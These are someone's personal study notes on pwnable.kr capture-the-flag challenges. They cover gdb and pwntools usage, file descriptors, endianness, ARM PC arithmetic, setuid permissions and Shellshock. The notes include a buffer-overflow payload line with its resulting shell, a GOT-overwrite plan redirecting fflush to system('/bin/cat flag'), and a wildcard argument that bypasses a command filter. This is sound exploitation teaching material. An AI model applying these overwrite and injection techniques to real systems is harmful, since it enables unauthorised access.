pwnable.kr (1)

Commands

Inspecting the call stack
backtrace: shows the order of function calls (the call-stack information)
frame N: switches to the context of stack frame number N
info frame: shows information about the current function's stack frame

The "disassemble /r" command shows the program's raw machine code in hexadecimal:
disass /r 'fflush@plt'

echo $PATH

pwntools

On 32-bit targets, p32() converts an integer to little-endian byte format

c.sendline(b"AAAA"*13+p32(0xcafebabe))

Add the b prefix; otherwise it is a str (UTF-8), which is encoded differently
bytes literals are printed with a leading b

┌─[zentreisender@parrotos]─[~/Documents/pwnable.kr/BOF]
└──╼ $python3 exploit.py 
[+] Opening connection to pwnable.kr on port 9000: Done
[*] Switching to interactive mode
$ id
uid=1008(bof) gid=1008(bof) groups=1008(bof)

The id command

Running with arguments

shell = ssh('col', 'pwnable.kr', port=2222, password='guest')
p = shell.process(argv=['./col', data_final])  # run with arguments
process() also works over an ssh connection

fd

When a program opens an existing file or creates a new one, the kernel returns a file descriptor to the process.
Every Unix process (except possibly daemons) should have three standard POSIX file descriptors, corresponding to the three standard streams.

strcmp()
returns 0 when the contents of both strings are equal

fd   stream            constant         stdio stream
0    standard input    STDIN_FILENO     stdin
1    standard output   STDOUT_FILENO    stdout
2    standard error    STDERR_FILENO    stderr

flag

I haven't done many of these. I spent ages single-stepping through the file, tried strace and ltrace hoping to spot something, then happened to notice the upx string and thought UPX packing wasn't only a Windows thing, and finally gave up; a search for write-ups showed that on Linux, upx -d is all you need.

Set a breakpoint at leave, then in
peda:
x/s on the malloc'd address gives the flag

passcode

GOT entry overwrite

https://medium.com/@andrew-bae/pwnable-kr-passcode-writeup-2fdfd9fec283
Stack overflow? scanf(%100, name)

   0x804862f <welcome+38>:    lea    edx,[ebp-0x70]

0x70 = 112, so at least 116 characters are needed to reach the return address; name is only 100 bytes in total, so overflowing through name won't work


[24] .data PROGBITS 0804a024 001024 000008 00 WA 0 0 4
We could instead place the wanted numbers directly at ebp-0x10 and ebp-0xc, but scanf stops the input at a space

gdb-peda$ print $ebp-0x70
$1 = (void *) 0xffe43ab8

0x804857c <login+24>:    mov    edx,DWORD PTR [ebp-0x10]

0x80485aa <login+70>:    mov    edx,DWORD PTR [ebp-0xc]

0x80485c5 <login+97>:    cmp    DWORD PTR [ebp-0x10],0x528e6
0x80485ce <login+106>:    cmp    DWORD PTR [ebp-0xc],0xcc07c9

0x70 - 0xc = 100, just short of reaching it


scanf() ends the input of one data item when it encounters:
① a space, newline ("Enter") or tab;
② the end of the field width;
③ illegal input.


Partial RELRO(The GOT table can be overwritten)

So, if I overwrite fflush@got.plt address as system("/bin/cat flag"); address, this binary will execute system("/bin/cat flag"); after scanf.

Little-endian investigation

objdump -R ./passcode
0804a004 R_386_JUMP_SLOT   fflush@GLIBC_2.0

PLT entry
8048430:    ff 25 04 a0 04 08        jmp    *0x804a004
The address inside the instruction bytes is reversed, i.e. little-endian
Addresses in the GOT are reversed as well, i.e. little-endian
0x804a00c <puts@got.plt>:    0xf7597ca0
0x804a00c <puts@got.plt>:    0xa0    0x7c    0x59 0xf7

Addresses on the stack are little-endian too
0000| 0xffb30e38 --> 0xffb30e58
gdb-peda$ x/4bx $esp
0xffb30e38:    0x58    0x0e    0xb3    0xff

Only the storage is little-endian; reading the value back gives the original order
payload += p32(0x0804a004), so we write it little-endian onto the stack, yet the address that gets executed isn't "little-endian", why?

Input 12345678 = 0xBC614E
gdb-peda$ x/4bx $ebp-0xc
0xffffcf4c:    0x4e    0x61    0xbc    0x00
little-endian on the stack
Single-byte input is stored in order; multi-byte values such as int are stored little-endian
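To answer the "why" above, here is an added C example (not from these notes or pwnable.kr) that stores 12345678 the way scanf("%d") leaves it in an int, shows the bytes as they sit in memory, and reloads them: the CPU reads the same value back, so a p32()-packed address is "reversed" only in storage. The input string is constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Store a 32-bit value the way the CPU writes it to memory; on x86 this
 * produces the same byte order as pwntools p32(). */
static void store_u32(uint8_t out[4], uint32_t v) {
    memcpy(out, &v, sizeof v);
}

/* Load it back the way a mov or ret instruction would read it. */
static uint32_t load_u32(const uint8_t in[4]) {
    uint32_t v;
    memcpy(&v, in, sizeof v);
    return v;
}

/* The i-th byte (0 = lowest address) of v as it sits in memory. */
static int byte_at(uint32_t v, int i) {
    uint8_t b[4];
    store_u32(b, v);
    return b[i];
}

/* 1 if this host is little-endian (low byte at the lowest address). */
static int host_is_little_endian(void) {
    return byte_at(0x11223344u, 0) == 0x44;
}

/* What scanf("%d") leaves in an int for the given decimal text. */
static uint32_t parse_decimal(const char *text) {
    int n = 0;
    if (sscanf(text, "%d", &n) != 1) return 0;
    return (uint32_t)n;
}

/* Store, then reload: the value is unchanged whatever the byte order. */
static int roundtrip_ok(uint32_t v) {
    uint8_t b[4];
    store_u32(b, v);
    return load_u32(b) == v;
}

int main(void) {
    uint32_t v = parse_decimal("12345678");   /* constructed input from the notes */
    printf("%u = 0x%08x, bytes in memory:", v, v);
    for (int i = 0; i < 4; i++) printf(" %02x", byte_at(v, i));
    printf("\nlittle-endian host: %d, reload matches: %d\n",
           host_is_little_endian(), roundtrip_ok(v));
    return 0;
}
```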

Change the address in fflush's GOT entry to the address of the system call. This is not an address in libc but one in the code segment, i.e. it can be any executable address, e.g. 0x080485ea, but the argument must also be passed, so start a little earlier:

   0x080485e3 <+127>:    mov    DWORD PTR [esp],0x80487af
   0x080485ea <+134>:    call   0x8048460 <system@plt>
   0x080485ef <+139>:    leave  
   0x080485f0 <+140>:    ret    

0x80487af is the string argument
0x080485ea <+134>: call 0x8048460 <system@plt>

Code:
https://github.com/Finsenty54/attack-code/blob/master/pwnable.kr/passcode.py

random

Easy: rand() is not truly random

leg

arm

https://www.cnblogs.com/ichunqiu/p/9056630.html
While the add r0, r1, #5 instruction is executing, the second instruction is in the decode stage and the third is in the fetch stage. So while the first instruction executes, the PC register points at the third instruction. In other words, on a processor with a three-stage pipeline, PC always points at the instruction two ahead of the current one.

In ARM state each ARM instruction is 4 bytes, so PC = current instruction address + 8 bytes
In Thumb state each Thumb instruction is 2 bytes, so PC = current instruction address + 4 bytes

/*  key1
    0x00008cdc <+8>:    mov    r3, pc
    0x00008ce0 <+12>:   mov    r0, r3
    pc = 0x8ce4
    r4 = pc
    key2
    the pc should still be read while in ARM state
    pc = 0x00008d0c
    key3
    lr (return address) = 0x00008d80
    the three pc values added together equal the input k
*/

The server seems to be down
Flag given directly: My daddy has a lot of ARMv5te muscle!

mistake

fd = open("/home/mistake/password", O_RDONLY, 0400) < 0

Comparison operators bind tighter than the assignment operator
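The precedence trap in that line, shown as an added C example (not the challenge's own code): fake_open is a constructed stand-in for open(2) so the example runs offline, and the buggy form is written as a separate statement to keep the parse visible.

```c
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for open(2) so the example runs offline: returns
 * a pretend descriptor 3 for the one "existing" path, -1 otherwise. */
static int fake_open(const char *path) {
    return strcmp(path, "/home/mistake/password") == 0 ? 3 : -1;
}

/* The pattern from the challenge, fd = open(...) < 0: `<` binds tighter
 * than `=`, so fd receives the result of the comparison (0 or 1), never
 * the descriptor that open() returned. */
static int buggy_open(const char *path) {
    int fd;
    fd = fake_open(path) < 0;    /* parses as fd = (fake_open(path) < 0) */
    if (fd) {
        return -1;               /* open failed: fd is 1 here */
    }
    return fd;                   /* open succeeded: fd is 0, i.e. stdin */
}

/* Corrected form: assign first, then compare. */
static int fixed_open(const char *path) {
    int fd;
    if ((fd = fake_open(path)) < 0) {
        return -1;
    }
    return fd;
}

int main(void) {
    const char *p = "/home/mistake/password";
    printf("buggy: %d (reads from fd 0 = stdin)\n", buggy_open(p));
    printf("fixed: %d (the real descriptor)\n", fixed_open(p));
    printf("missing file: buggy %d, fixed %d\n",
           buggy_open("/nope"), fixed_open("/nope"));
    return 0;
}
```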

shellshock

https://linux.die.net/man/7/credentials
https://en.wikipedia.org/wiki/User_identifier

The different user IDs

Effective user ID and effective group ID. These IDs are used by the kernel to determine the permissions that the process will have when accessing shared resources such as message queues, shared memory, and semaphores. On most UNIX systems, these IDs also determine the permissions when accessing files.
A process can obtain its effective user (group) ID using geteuid(2) (getegid(2)).

Saved set-user-ID and saved set-group-ID. These IDs are used in set-user-ID and set-group-ID programs to save a copy of the corresponding effective IDs that were set when the program was executed (see execve(2)).
A set-user-ID program can assume and drop privileges by switching its effective user ID back and forth between the values in its real user ID and saved set-user-ID. This switching is done via calls to seteuid(2), setreuid(2), or setresuid(2).
For example, if the ruid is an ordinary user, switching to it drops privileges; if the suid is root, setting the euid to the suid raises privileges again
A process can obtain its saved set-user-ID (set-group-ID) using getresuid(2) (getresgid(2)).

Real user ID and real group ID. These IDs determine who owns the process. A process can obtain its real user (group) ID using getuid(2) (getgid(2)).

The setuid attribute (permission), i.e. the file has +s

-r-xr-sr-x 1 root shellshock_pwn 8547 Oct 12 2014 shellshock
When the setuid or setgid attributes are set on an executable file, then any users able to execute the file will automatically execute the file with the privileges of the file's owner (commonly root) and/or the file's group, depending upon the flags set

chmod by setting the high-order octal digit to 4 for setuid or 2 for setgid. "chmod 6711 file" will set both the setuid and setgid bits (4+2=6), making the file read/write/executable for the owner (7), and executable by the group (first 1) and others (second 1). When a user other than the owner executes the file, the process will run with user and group permissions set upon it by its owner. For example, if the file is owned by user root and group wheel, it will run as root:wheel no matter who executes the file.

Example

4701 on an executable file owned by 'root' and the group 'root'

A user named 'thompson' attempts to execute the file. The executable permission for all users is set (the '1') so 'thompson' can execute the file. The file owner is 'root' and the SUID permission is set (the '4') - so the file is executed as 'root'.

Permissions in this challenge

shellshock@pwnable:~$ stat -c "%a %A" shellshock
2555 -r-xr-sr-x
the setgid bit is set

The ShellShock vulnerability
https://www.freebuf.com/articles/system/45390.html

coin1

pwntools isn't installed on the server, so the script wouldn't run; I tried rewriting it with re + socket but that didn't work either, and I couldn't be bothered to go further.

cmd1

echo $PATH
PATH lists the directories where programs live; when you run a program that is not in the current directory, the directories in PATH are searched for it
The cat command is in /bin
This challenge uses Linux wildcards
./cmd1 "/bin/cat fla*"